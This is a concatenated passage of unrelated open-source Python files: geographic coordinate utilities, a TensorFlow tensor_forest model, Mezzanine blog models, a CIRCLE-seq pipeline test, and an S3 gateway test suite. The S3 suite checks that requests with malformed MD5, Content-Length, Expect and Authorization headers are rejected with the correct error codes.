Return coordinates of point **distance** degrees from
(**lat0**, **lon0**) along **azimuth**.
:param float lat0: latitude of starting point
:param float lon0: longitude of starting point
:param float azimuth: azimuth of path to traverse **{Units:**
*Degrees*, **Range:** *(-inf, inf)*\ **}**
:param float distance: distance along path to traverse **{Units**:
*Degrees*\ **}**
:returns: geographic coordinates **distance** degrees from
(**lat0**, **lon0**) along **azimuth**
:rtype: (float, float)
:raises ValueError: if resulting coordinates are invalid
"""
phi = az2rad(azimuth)
dlat = sin(phi) * distance
dlon = cos(phi) * distance
lat, lon = lat0+dlat, lon0+dlon
validate_geographic_coords(lat, lon)
return(lat, lon)
def distance(u, v):
"""
Return the Euclidean distance between vectors **u** and **v**.
:param u: Vector 1.
:type u: list, tuple or other iterable
:param v: Vector 2.
:type v: list, tuple or other iterable
:returns: Euclidean distance between vectors **u** and **v**
:rtype: float
"""
if len(u) != len(v):
raise(ValueError("vectors u and v must have same length"))
u = np.asarray(u)
v = np.asarray(v)
return(sqrt(sum((u - v) ** 2)))
def get_line_endpoints(lat0, lon0, azimuth, length):
"""
Return the geographic coordinates (latitude, longitude) of the
endpoints of a length=\ **length** line passing through coordinates
(**lat0**, **lon0**) with azimuth=\ **azimuth**.
:param float lat0: latitude coordinate of line center {**Units**:
degrees, **Range**: [-90, 90]}
:param float lon0: longitude coordinate of line center {**Units**:
degrees, **Range**: [-180, 180]}
:param float azimuth: azimuth of line {**Units**: degrees,
**Range**: [-180, 180]}
:param float length: length of line **{Units:** *degrees*\ **}**
:returns: geographic coordinates of the endpoints of a length=\
**length** line passing through (**lat0**, **lon0**) with azimuth=\
**azimuth**
:rtype: ((float, float), (float, float))
"""
phi = radians(azimuth)
l2 = 0.5 * length
theta1 = -phi + pi/2
theta2 = -phi - pi/2
return((lon0 + l2 * cos(theta2), lat0 + l2 * sin(theta2)),
(lon0 + l2 * cos(theta1), lat0 + l2 * sin(theta1)))
def geo2sph(coordinates):
"""
Convert geographic coordinates to spherical coordinates.
:param coordinates: geographic coordinates *(lat, lon, depth)*, or an
array of such triples, where lat is in degrees {**Range**: [-90, 90]},
lon is in degrees {**Range**: [-180, 180]} and depth is the depth from
the surface in km {**Range**: (-inf, inf)}
:returns: spherical coordinate conversion *(r, theta, phi)* of
geographic coordinates
:rtype: (float, float, float)
"""
coordinates = np.asarray(coordinates)
if coordinates.shape == (3,):
lat, lon, z = validate_geographic_coords(coordinates)
theta = radians(90. - lat)
phi = radians(lon)
r = EARTH_RADIUS - z
return(r, theta, phi)
return(np.array([geo2sph(coords) for coords in coordinates]))
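# e.g. (illustrative) geo2sph((90, 0, 0)) -> (EARTH_RADIUS, 0.0, 0.0),
# i.e. the north pole at the surface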
def radians2azimuth(theta):
"""
Convert value in radians measured counter-clockwise from East to
azimuth value measured in degrees clockwise from North.
:param float theta: value in radians measured clockwise from East
:returns: azimuth equivalent of **theta** measured in degrees
clockwise from North
:rtype: float
"""
return(degrees(pi/2 - theta))
def rad2az(theta):
"""
Convenience wrapper for :func:`radians2azimuth`.
"""
return(radians2azimuth(theta))
def sph2geo(r, theta, phi):
"""
Convert spherical coordinates to geographic coordinates.
:param float r: radial distance from coordinate system origin
{**Units**: km, **Range**: [0, inf)}
:param float theta: polar angle {**Units**: radians, **Range**: [0,
π]}
:param float phi: azimuthal angle {**Units**: radians, **Range**:
[-π, π]}
:returns: geographic coordinate conversion *(lat, lon, depth)* of
spherical coordinates
:rtype: (float, float, float)
"""
r, theta, phi = validate_spherical_coords([r, theta, phi])
z = EARTH_RADIUS - r
lat = 90 - degrees(theta)
lon = degrees(phi)
return(lat, lon, z)
def sph2xyz(r, theta, phi):
"""
Convert spherical coordinates to cartesian coordinates.
:param float r: radial distance from coordinate system origin
{**Units**: km, **Range**: [0, inf)}
:param float theta: polar angle {**Units**: radians, **Range**: [0,
π]}
:param float phi: azimuthal angle {**Units**: radians, **Range**:
[-π, π]}
:returns: cartesian coordinate conversion *(x, y, z)* of spherical
coordinates
:rtype: (float, float, float)
"""
r, theta, phi = validate_spherical_coords([r, theta, phi])
x = r * sin(theta) * cos(phi)
y = r * sin(theta) * sin(phi)
z = r * cos(theta)
return x, y, z
def xyz2sph(x, y, z):
"""
Convert cartesian coordinates to spherical coordinates.
:param float x: cartesian x-coordinate {**Units**: km, **Range**:
(-inf, inf)}
:param float y: cartesian y-coordinate {**Units**: km, **Range**:
(-inf, inf)}
:param float z: cartesian z-coordinate {**Units**: km, **Range**:
(-inf, inf)}
:returns: spherical coordinate conversion *(r, theta, phi)* of
cartesian coordinates
:rtype: (float, float, float)
"""
r = sqrt(x ** 2 + y ** 2 + z ** 2)
theta = acos(z / r)
phi = atan2(y, x)
return( r, theta, phi)
def rotation_matrix(axis, theta):
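# Right-handed rotation by theta (radians) about the x (1), y (2) or z (3) axis.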
if axis == 1 or axis == 'x' or axis == 'X':
return np.array([[1, 0, 0],
[0, cos(theta), -sin(theta)],
[0, sin(theta), cos(theta)]])
elif axis == 2 or axis == 'y' or axis == 'Y':
return np.array([[cos(theta), 0, sin(theta)],
[0, 1, 0],
[-sin(theta), 0, cos(theta)]])
elif axis == 3 or axis == 'z' or axis == 'Z':
return np.array([[cos(theta), -sin(theta), 0],
[sin(theta), cos(theta), 0],
[0, 0, 1]])
else:
raise ValueError("invalid axis")
def validate_geographic_coords(coordinates):
data = np.asarray(coordinates)
if data.shape == (3,):
if not -90 <= data[0] <= 90:
raise(ValueError("latitude must be in range [-90, 90]: %f" % data[0]))
data[1] %= 360
data[1] = data[1] if data[1] < 180 else data[1] - 360
return(data)
return(np.asarray([validate_geographic_coords(coords) for coords in data]))
def validate_spherical_coords(coordinates):
data = np.asarray(coordinates)
if data.shape == (3,):
if data[0] < 0:
raise(ValueError("Invalid value for rho: {:f}".format(data[0])))
if np.pi < data[1] % (2 * np.pi) < np.pi * 2:
raise(ValueError("Invalid value for theta: {:f}".format(data[1])))
data[2] %= 2 * np.pi
data[2] = data[2] if 0 <= data[2] <= np.pi else data[2] - 2 * np.pi
return(data)
return(np.asarray([validate_spherical_coords(coords) for coords in data]))
def test():
coords = np.asarray([-90, 79, 3])
print(validate_geographic_coords(coords))
coords = np.asarray([[-89, -117, 3],[45, 426, 4]])
print(validate_geographic_coords(coords))
if __name__ == "__main__":
test()
|
Mistobaan/tensorflow
|
refs/heads/master
|
tensorflow/contrib/tensor_forest/hybrid/python/models/k_feature_decisions_to_data_then_nn.py
|
189
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A model that places a soft decision tree embedding before a neural net."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.tensor_forest.hybrid.python import hybrid_model
from tensorflow.contrib.tensor_forest.hybrid.python.layers import decisions_to_data
from tensorflow.contrib.tensor_forest.hybrid.python.layers import fully_connected
from tensorflow.python.training import adagrad
class KFeatureDecisionsToDataThenNN(hybrid_model.HybridModel):
"""A model that places a soft decision tree embedding before a neural net."""
def __init__(self,
params,
device_assigner=None,
optimizer_class=adagrad.AdagradOptimizer,
**kwargs):
super(KFeatureDecisionsToDataThenNN, self).__init__(
params,
device_assigner=device_assigner,
optimizer_class=optimizer_class,
**kwargs)
self.layers = [decisions_to_data.KFeatureDecisionsToDataLayer(
params, 0, device_assigner),
fully_connected.FullyConnectedLayer(
params, 1, device_assigner=device_assigner)]
|
Kniyl/mezzanine
|
refs/heads/master
|
mezzanine/blog/models.py
|
30
|
from __future__ import unicode_literals
from future.builtins import str
from django.db import models
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from mezzanine.conf import settings
from mezzanine.core.fields import FileField
from mezzanine.core.models import Displayable, Ownable, RichText, Slugged
from mezzanine.generic.fields import CommentsField, RatingField
from mezzanine.utils.models import AdminThumbMixin, upload_to
class BlogPost(Displayable, Ownable, RichText, AdminThumbMixin):
"""
A blog post.
"""
categories = models.ManyToManyField("BlogCategory",
verbose_name=_("Categories"),
blank=True, related_name="blogposts")
allow_comments = models.BooleanField(verbose_name=_("Allow comments"),
default=True)
comments = CommentsField(verbose_name=_("Comments"))
rating = RatingField(verbose_name=_("Rating"))
featured_image = FileField(verbose_name=_("Featured Image"),
upload_to=upload_to("blog.BlogPost.featured_image", "blog"),
format="Image", max_length=255, null=True, blank=True)
related_posts = models.ManyToManyField("self",
verbose_name=_("Related posts"), blank=True)
admin_thumb_field = "featured_image"
class Meta:
verbose_name = _("Blog post")
verbose_name_plural = _("Blog posts")
ordering = ("-publish_date",)
def get_absolute_url(self):
"""
URLs for blog posts can either be just their slug, or prefixed
with a portion of the post's publish date, controlled by the
setting ``BLOG_URLS_DATE_FORMAT``, which can contain the value
``year``, ``month``, or ``day``. Each of these maps to the name
of the corresponding urlpattern, and if defined, we loop through
each of these and build up the kwargs for the correct urlpattern.
The order in which we loop through them is important, since the
order goes from least granular (just year) to most granular
(year/month/day).
"""
url_name = "blog_post_detail"
kwargs = {"slug": self.slug}
date_parts = ("year", "month", "day")
if settings.BLOG_URLS_DATE_FORMAT in date_parts:
url_name = "blog_post_detail_%s" % settings.BLOG_URLS_DATE_FORMAT
for date_part in date_parts:
date_value = str(getattr(self.publish_date, date_part))
if len(date_value) == 1:
date_value = "0%s" % date_value
kwargs[date_part] = date_value
if date_part == settings.BLOG_URLS_DATE_FORMAT:
break
return reverse(url_name, kwargs=kwargs)
# These methods are deprecated wrappers for keyword and category
# access. They existed to support Django 1.3, which lacked
# prefetch_related, so prefetching was implemented manually in the
# blog list views. All this is gone now, but the access methods
# still exist for older templates.
def category_list(self):
from warnings import warn
warn("blog_post.category_list in templates is deprecated"
"use blog_post.categories.all which are prefetched")
return getattr(self, "_categories", self.categories.all())
def keyword_list(self):
from warnings import warn
warn("blog_post.keyword_list in templates is deprecated"
"use the keywords_for template tag, as keywords are prefetched")
try:
return self._keywords
except AttributeError:
keywords = [k.keyword for k in self.keywords.all()]
setattr(self, "_keywords", keywords)
return self._keywords
class BlogCategory(Slugged):
"""
A category for grouping blog posts into a series.
"""
class Meta:
verbose_name = _("Blog Category")
verbose_name_plural = _("Blog Categories")
ordering = ("title",)
@models.permalink
def get_absolute_url(self):
return ("blog_post_list_category", (), {"category": self.slug})
|
tsailabSJ/circleseq
|
refs/heads/master
|
test/test_circleseq_merged.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_circleseq_merged
----------------------------------
Tests for `circleseq` module.
"""
import yaml
import unittest
import os
import shutil
import utils
from circleseq import circleseq
TEST_OUTPUT_PATH = 'tmp'
TEST_MANIFEST_PATH = os.path.join('CIRCLEseq_MergedTest.yaml')
CORRECT_ALIGNED_OUTPUT = 'data/MergedOutput/aligned'
CORRECT_IDENTIFIED_OUTPUT = 'data/MergedOutput/identified'
CORRECT_MERGED_OUTPUT = 'data/MergedOutput/merged'
CORRECT_VISUALIZATION_OUTPUT = 'data/MergedOutput/visualization'
CORRECT_ALL_OUTPUT = 'data/MergedOutput'
class FullPipelineTestCase(unittest.TestCase):
def setUp(self):
pass
def testFullPipeline(self):
c = circleseq.CircleSeq()
c.parseManifest(TEST_MANIFEST_PATH)
# Align and test the alignment output
c.alignReads()
self.assertTrue(utils.checkFolderEquality(os.path.join(c.analysis_folder, "aligned"), CORRECT_ALIGNED_OUTPUT))
# Find cleavage sites
c.findCleavageSites()
self.assertTrue(utils.checkFolderEquality(os.path.join(c.analysis_folder, 'identified'), CORRECT_IDENTIFIED_OUTPUT))
# Visualize filtered sites
c.visualize()
self.assertTrue(utils.checkFolderEquality(os.path.join(c.analysis_folder, 'visualization'), CORRECT_VISUALIZATION_OUTPUT))
def tearDown(self):
pass
if __name__ == '__main__':
unittest.main()
|
Qihoo360/zeppelin-gateway
|
refs/heads/master
|
tests/s3tests/functional/test_headers.py
|
2
|
from cStringIO import StringIO
import boto.connection
import boto.exception
import boto.s3.connection
import boto.s3.acl
import boto.utils
import bunch
import nose
import operator
import random
import string
import socket
import ssl
import os
import re
from urlparse import urlparse
from boto.s3.connection import S3Connection
from nose.tools import eq_ as eq
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
from .utils import assert_raises
import AnonymousAuth
from email.header import decode_header
from . import (
_make_raw_request,
nuke_prefixed_buckets,
get_new_bucket,
s3,
config,
get_prefix,
TargetConnection,
targets,
)
_orig_conn = {}
_orig_authorize = None
_custom_headers = {}
_remove_headers = []
boto_type = None
# HeaderS3Connection and _our_authorize are necessary to be able to arbitrarily
# overwrite headers. Depending on the version of boto, one or the other is
# necessary. We later determine in setup what needs to be used.
def _update_headers(headers):
""" update a set of headers with additions/removals
"""
global _custom_headers, _remove_headers
headers.update(_custom_headers)
for header in _remove_headers:
try:
del headers[header]
except KeyError:
pass
# Note: We need to update the headers twice. The first time so the
# authentication signing is done correctly. The second time to overwrite any
# headers modified or created in the authentication step.
class HeaderS3Connection(S3Connection):
""" establish an authenticated connection w/customized headers
"""
def fill_in_auth(self, http_request, **kwargs):
_update_headers(http_request.headers)
S3Connection.fill_in_auth(self, http_request, **kwargs)
_update_headers(http_request.headers)
return http_request
def _our_authorize(self, connection, **kwargs):
""" perform an authentication w/customized headers
"""
_update_headers(self.headers)
_orig_authorize(self, connection, **kwargs)
_update_headers(self.headers)
def setup():
global boto_type
# we determine what we need to replace by the existence of particular
# attributes. boto 2.0rc1 has fill_in_auth for S3Connection, while boto 2.0
# has authorize for HTTPRequest.
if hasattr(S3Connection, 'fill_in_auth'):
global _orig_conn
boto_type = 'S3Connection'
for conn in s3:
_orig_conn[conn] = s3[conn]
header_conn = HeaderS3Connection(
aws_access_key_id=s3[conn].aws_access_key_id,
aws_secret_access_key=s3[conn].aws_secret_access_key,
is_secure=s3[conn].is_secure,
port=s3[conn].port,
host=s3[conn].host,
calling_format=s3[conn].calling_format
)
s3[conn] = header_conn
elif hasattr(boto.connection.HTTPRequest, 'authorize'):
global _orig_authorize
boto_type = 'HTTPRequest'
_orig_authorize = boto.connection.HTTPRequest.authorize
boto.connection.HTTPRequest.authorize = _our_authorize
else:
raise RuntimeError
def teardown():
global boto_type
# replace original functionality depending on the boto version
if boto_type == 'S3Connection':
global _orig_conn
for conn in s3:
s3[conn] = _orig_conn[conn]
_orig_conn = {}
elif boto_type == 'HTTPRequest':
global _orig_authorize
boto.connection.HTTPRequest.authorize = _orig_authorize
_orig_authorize = None
else:
raise RuntimeError
def _clear_custom_headers():
""" Eliminate any header customizations
"""
global _custom_headers, _remove_headers
_custom_headers = {}
_remove_headers = []
def _add_custom_headers(headers=None, remove=None):
""" Define header customizations (additions, replacements, removals)
"""
global _custom_headers, _remove_headers
if not _custom_headers:
_custom_headers = {}
if headers is not None:
_custom_headers.update(headers)
if remove is not None:
_remove_headers.extend(remove)
def _setup_bad_object(headers=None, remove=None):
""" Create a new bucket, add an object w/header customizations
"""
bucket = get_new_bucket()
_add_custom_headers(headers=headers, remove=remove)
return bucket.new_key('foo')
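# The returned key is named 'foo' in a fresh bucket; the header customizations
# registered above are applied by the patched auth path when the key is used.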
def tag(*tags):
def wrap(func):
for tag in tags:
setattr(func, tag, True)
return func
return wrap
#
# common tests
#
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/invalid MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_invalid_short():
key = _setup_bad_object({'Content-MD5':'YWJyYWNhZGFicmE='})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidDigest')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/mismatched MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_bad():
key = _setup_bad_object({'Content-MD5':'rL0Y20zC+Fzt72VPzMSk2A=='})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'BadDigest')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty MD5')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_empty():
key = _setup_bad_object({'Content-MD5': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'InvalidDigest')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphics in MD5')
@attr(assertion='fails 403')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_unreadable():
key = _setup_bad_object({'Content-MD5': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no MD5 header')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_md5_none():
key = _setup_bad_object(remove=('Content-MD5',))
key.set_contents_from_string('bar')
# strangely, amazon doesn't report an error with a non-expect 100 also, our
# error comes back as html, and not xml as I normally expect
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/Expect 200')
@attr(assertion='garbage, but S3 succeeds!')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_object_create_bad_expect_mismatch():
key = _setup_bad_object({'Expect': 200})
key.set_contents_from_string('bar')
# this is a really long test, and I don't know if it's valid...
# again, accepts this with no troubles
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty expect')
@attr(assertion='succeeds ... should it?')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_expect_empty():
key = _setup_bad_object({'Expect': ''})
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no expect')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_expect_none():
key = _setup_bad_object(remove=('Expect',))
key.set_contents_from_string('bar')
# this is a really long test..
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic expect')
@attr(assertion='garbage, but S3 succeeds!')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_object_create_bad_expect_unreadable():
key = _setup_bad_object({'Expect': '\x07'})
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty content length')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_object_create_bad_contentlength_empty():
key = _setup_bad_object({'Content-Length': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, None)
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/negative content length')
@attr(assertion='fails 400')
@attr('fails_on_mod_proxy_fcgi')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_negative():
key = _setup_bad_object({'Content-Length': -1})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no content length')
@attr(assertion='fails 411')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_none():
key = _setup_bad_object(remove=('Content-Length',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 411)
eq(e.reason, 'Length Required')
eq(e.error_code,'MissingContentLength')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic content length')
@attr(assertion='fails 400')
@attr('fails_on_mod_proxy_fcgi')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contentlength_unreadable():
key = _setup_bad_object({'Content-Length': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, None)
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/content length too long')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_object_create_bad_contentlength_mismatch_above():
content = 'bar'
length = len(content) + 1
key = _setup_bad_object({'Content-Length': length})
# Disable retries since key.should_retry will discard the response with
# PleaseRetryException.
def no_retry(response, chunked_transfer): return False
key.should_retry = no_retry
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, content)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, 'RequestTimeout')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/content type text/plain')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contenttype_invalid():
key = _setup_bad_object({'Content-Type': 'text/plain'})
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty content type')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contenttype_empty():
key = _setup_bad_object({'Content-Type': ''})
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no content type')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_contenttype_none():
key = _setup_bad_object(remove=('Content-Type',))
key.set_contents_from_string('bar')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic content type')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_object_create_bad_contenttype_unreadable():
key = _setup_bad_object({'Content-Type': '\x08'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
assert e.error_code in ('AccessDenied', 'SignatureDoesNotMatch')
# the teardown is really messed up here. check it out
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/non-graphic authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_object_create_bad_authorization_unreadable():
key = _setup_bad_object({'Authorization': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/empty authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_authorization_empty():
key = _setup_bad_object({'Authorization': ''})
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
# the teardown is really messed up here. check it out
@tag('auth_common')
@attr(resource='object')
@attr(method='put')
@attr(operation='create w/no authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_create_bad_authorization_none():
key = _setup_bad_object(remove=('Authorization',))
e = assert_raises(boto.exception.S3ResponseError, key.set_contents_from_string, 'bar')
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no content length')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_contentlength_none():
_add_custom_headers(remove=('Content-Length',))
get_new_bucket()
@tag('auth_common')
@attr(resource='bucket')
@attr(method='acls')
@attr(operation='set w/no content length')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_object_acl_create_contentlength_none():
bucket = get_new_bucket()
key = bucket.new_key('foo')
key.set_contents_from_string('blah')
_add_custom_headers(remove=('Content-Length',))
key.set_acl('public-read')
@tag('auth_common')
@attr(resource='bucket')
@attr(method='acls')
@attr(operation='set w/invalid permission')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_put_bad_canned_acl():
bucket = get_new_bucket()
_add_custom_headers({'x-amz-acl': 'public-ready'})
e = assert_raises(boto.exception.S3ResponseError, bucket.set_acl, 'public-read')
eq(e.status, 400)
# Strangely, Amazon doesn't report an error for a non-100 Expect value. Also, our
# error comes back as HTML, and not XML as I would normally expect.
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/expect 200')
@attr(assertion='garbage, but S3 succeeds!')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_bucket_create_bad_expect_mismatch():
_add_custom_headers({'Expect':200})
bucket = get_new_bucket()
# this is a really long test, and I don't know if it's valid...
# again, S3 accepts this with no trouble
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/expect empty')
@attr(assertion='garbage, but S3 succeeds!')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_expect_empty():
_add_custom_headers({'Expect': ''})
bucket = get_new_bucket()
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/expect nongraphic')
@attr(assertion='garbage, but S3 succeeds!')
# this is a really long test..
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_bucket_create_bad_expect_unreadable():
_add_custom_headers({'Expect': '\x07'})
bucket = get_new_bucket()
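# Helper for tests that need a dedicated HeaderS3Connection (built from the
# s3.main settings) instead of reusing the shared default connection.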
def _create_new_connection():
# We're going to need to manually build a connection using bad authorization info.
# But to save the day, let's just hijack the settings from s3.main. :)
main = s3.main
conn = HeaderS3Connection(
aws_access_key_id=main.aws_access_key_id,
aws_secret_access_key=main.aws_secret_access_key,
is_secure=main.is_secure,
port=main.port,
host=main.host,
calling_format=main.calling_format,
)
return TargetConnection(targets.main.default.conf, conn)
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty content length')
@attr(assertion='fails 400')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
def test_bucket_create_bad_contentlength_empty():
conn = _create_new_connection()
_add_custom_headers({'Content-Length': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket, conn)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/negative content length')
@attr(assertion='fails 400')
@attr('fails_on_mod_proxy_fcgi')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_contentlength_negative():
_add_custom_headers({'Content-Length': -1})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no content length')
@attr(assertion='succeeds')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_contentlength_none():
_add_custom_headers(remove=('Content-Length',))
bucket = get_new_bucket()
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic content length')
@attr(assertion='fails 400')
@attr('fails_on_mod_proxy_fcgi')
@attr('fails_strict_rfc2616')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_contentlength_unreadable():
_add_custom_headers({'Content-Length': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 400)
eq(e.reason.lower(), 'bad request') # some proxies vary the case
eq(e.error_code, None)
# the teardown is really messed up here. check it out
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/non-graphic authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
@attr('fails_on_rgw')
@attr('fails_strict_rfc2616')
def test_bucket_create_bad_authorization_unreadable():
_add_custom_headers({'Authorization': '\x07'})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/empty authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_authorization_empty():
_add_custom_headers({'Authorization': ''})
e = assert_raises(boto.exception.S3ResponseError, get_new_bucket)
eq(e.status, 403)
eq(e.reason, 'Forbidden')
eq(e.error_code, 'AccessDenied')
# the teardown is really messed up here. check it out
@tag('auth_common')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create w/no authorization')
@attr(assertion='fails 403')
@nose.with_setup(teardown=_clear_custom_headers)
def test_bucket_create_bad_authorization_none():
_add_custom_headers(remove=('Authorization',))
